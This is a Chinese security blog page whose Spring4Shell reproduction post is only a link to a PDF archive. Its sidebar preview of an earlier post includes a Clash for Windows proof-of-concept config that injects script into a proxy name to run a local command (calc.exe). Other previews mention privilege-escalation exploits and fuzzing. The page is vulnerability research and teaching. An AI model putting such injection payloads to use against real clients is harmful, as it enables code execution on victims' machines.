Joe1sn's Cabin
【漏洞复现】CVE-2022-22965 Spring4Shell复现与调试
Back to Home
【漏洞复现】CVE-2022-22965 Spring4Shell复现与调试
Created
2022-04-01
|
Updated
2023-08-25
|
CVE
|
Post Views:
wayback没有镜像,自己备份的md找不到了,只有PDF存档
https://joe1sn.top/spring4shell.pdf
Author:
Joe1sn
Link:
https://joe1sn.eu.org/2022/04/01/spring4shell/
Copyright Notice:
All articles on this blog are licensed under
CC BY-NC-SA 4.0
unless otherwise stated.
CVE
spring
Previous
【漏洞复现】clash
影响版本 Windows v0.19.9版本以下 漏洞复现 漏洞程序连接: https://github.com/Fndroid/clash_for_windows_pkg/releases poc.yaml port: 7890socks-port: 7891allow-lan: truemode: Rulelog-level: infoexternal-controller: :9090proxies: - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);> type: socks5 server: 127.0.0.1 port: "17938" skip-cert-verify: true - name: abc type: socks5 server: 127.0.0.1 port: "8088" ...
Next
JavaWeb笔记-JDBC
基本概念 快速入门 对JDBC中各个接口和类详解 JDBC概念 **概念:**Java DataBase Connectivity ,Java数据库连接 本质(类似Django的ORM):The sun公司定义的一套操作所有关系型数据库的规则(接口)。各个厂家根据接口去实现。我们可以是有这套接口编程,真正的驱动时jar包中的实现类 快速入门 简单步骤 导入驱动jar包 注册驱动 数据库连接对象Connection 定义sql 获取执行SQL语句的Statement对象 执行sql,接受返回结果 处理结果 释放资源 简单使用 package learn.jdbc;import java.sql.Connection;import java.sql.DriverManager;import java.sql.Statement;/*JDBC快速入门 */public class JdbcDemo1 { public static void main(String[] args) throws Exception { //1....
Related Articles
2026-05-03
【漏洞】RedSun复现
微软也会犯低级错误 公众号:https://mp.weixin.qq.com/s/orGyVntLp8aM1_BH-R2eug 或许我们的公众号会有更多你感兴趣的内容 CVE-2026-33825又名RedSun,Microsoft Defender 中访问控制粒度不足,允许获授权的攻击者在本地提升权限。[1] 当 Windows Defender 识别出某个恶意文件带有“云标签”时,出于某种极其愚蠢且荒谬的原因,这款本该负责防护的杀毒软件竟然会自作聪明地决定:把刚刚发现的这个文件原封不动地重写回其原始位置。而这个 PoC 正是利用了这一反常行为,通过覆盖系统文件来获取管理员权限。[2] PoC地址 原始PoC[1]: https://github.com/Nightmare-Eclipse/RedSun/ cmake的自制PoC: https://github.com/Joe1sn/CVE-2026-33825 前置知识 Windows 对象管理器 Windows 内核维护一个全局的分层命名空间,管理所有内核对象(设备、文件、事件、信号量等)。结构类似于...
2022-04-13
SUDO堆溢出提权:从fuzz到exp [2]
前文:https://blog.joe1sn.top/2022/01/04/CVE-2021-3156/ 受到youtuber:LiveOverflow的系列教程的启发,我发现在中文互联网上并没有相关的翻译教程,所以我想以实验报告的形式来创造这个从fuzz到exp的系列图文教程 原始视频合集:https://www.youtube.com/watch?v=uj1FTiczJSE&list=PLhixgUqwRTjy0gMuT4C3bmjeZjuNQyqdx 原始Blog:https://liveoverflow.com/why-pick-sudo-research-target-part-1/ 原作者代码仓库:https://github.com/LiveOverflow/pwnedit My previous blog: https://blog.joe1sn.top/2022/01/04/CVE-2021-3156/ I was inspired by the LiveOverflow’s Sudo Vulnerability Walkthrough on you...
2022-08-14
密码朋克:一份密码朋克宣言
为何自由与隐私如此重要 译文 一份密码朋克宣言 Eric Hughes著 Joe1sn渣译 隐私在电子时代对于一个开放的社会是必要的。隐私不是保密。隐私是一个人不想让全世界知道,但是保密是一个人不想让全任何人知道。隐私是一个人对这个世界选择性表达自我的权力。 如果双方有某种交易,那么每一方都有他们互动的记忆。 每一方都可以谈论他们自己对此的记忆; 谁能阻止这发生?人们可以通过法律反对它,但是对于言论自由甚至比隐私更加重要,这是开放社会的基础。如果多方在同一个论坛上共同发言,则每一方都可以与其他所有方共同对话,并将个体的和其他只是汇总在一起。电子通信的力量已经使这种讲话称为可能,它不会仅仅因为我们可能想要它而消失。 既然我们渴望隐私,我们必须确保交易的每方只有直接与该交易相关的必要的信息。鉴于所有信息都能被表达出,我们必须确保尽可能少地透露无关信息。对于大多数例子中的个人标识(ID)的需要并不是十分突出。当我们在商店中购买一本杂志并付款给店员时,并没有必要知道我是谁。当我让我的电子邮箱提供方收发邮件时,我的提供方不需要知道谁与我对话或者我和其他人说了些什么。我的提供方只...
2023-07-19
【漏洞挖掘】win-afl使用指北-中级篇
为什么不叫高级篇,因为高级的我也不会 主要讲一下更贴近实际的用法吧 !!!仅大标题1完成,全片未完待续!!! 对DLL进行Fuzz 理论测试 代码还是上一篇提到的代码,依旧是32位,只不过溢出部分写在DLL里面 dll.c #include <stdio.h>__declspec(dllexport) void vuln(char *FileDir){ char password[6] = "ABCDE"; char str[6]; FILE *fp; if(!(fp=fopen(FileDir,"r"))){ printf("Open Failed\n"); exit(0); } fgets(str, 0x1000, fp); str[5]='\0'; if(strcmp(str,password)==0) // fprintf(stderr,"OK.\n"); printf("OK.\n"); else...
2023-07-18
【漏洞挖掘】win-afl使用指北-初级篇
在21年的时候曾经小小的使用了一点WinAFL,现在再回过头来做笔记 这里主要讲述WinAFL+DynamoRIO的Fuzz方法 简介 知道创宇这篇文章讲的已经很好了:https://paper.seebug.org/323/ 由于闭源特点,那么需要使用DynamoRIO进行插桩,检测指令块的转移 WinAFL主要特点就是将AFL中的函数使用WinAPI进行重写,然后调用DynamoRIO的API完成fuzz 编译 主要是参考了https://bbs.kanxue.com/thread-261323.htm和官方过程:https://dynamorio.org/page_building.html DynamoRIO 32位 1. 编译 软件下载一把梭 git clone https://github.com/DynamoRIO/dynamorio.gitcd dynamoriomkdir build_Win32mkdir build_x64 这里我使用的是x86 Native Tools Command Prompt命令行 cmake -G"Visual ...
2022-04-11
SUDO堆溢出提权:从fuzz到exp [1]
前文:https://blog.joe1sn.top/2022/01/04/CVE-2021-3156/ 受到youtuber:LiveOverflow的系列教程的启发,我发现在中文互联网上并没有相关的翻译教程,所以我想以实验报告的形式来创造这个从fuzz到exp的系列图文教程 原始视频合集:https://www.youtube.com/watch?v=uj1FTiczJSE&list=PLhixgUqwRTjy0gMuT4C3bmjeZjuNQyqdx 原始Blog:https://liveoverflow.com/why-pick-sudo-research-target-part-1/ 原作者代码仓库:https://github.com/LiveOverflow/pwnedit My previous blog: https://blog.joe1sn.top/2022/01/04/CVE-2021-3156/ I was inspired by the LiveOverflow’s Sudo Vulnerability Walkthrough on you...
Joe1sn
Articles
85
Tags
39
Categories
9
Follow Me
Announcement
lue lue lue
Recent Posts
【置顶】【编程】开发笔记
2098-12-31
【CTF】2026年腾讯游戏安全初赛
2026-05-07
windows rookit防护-PatchGuard
2026-05-05
【漏洞】RedSun复现
2026-05-03
【Win Pwn】Windows10 内核VS池溢出利用
2026-05-01
简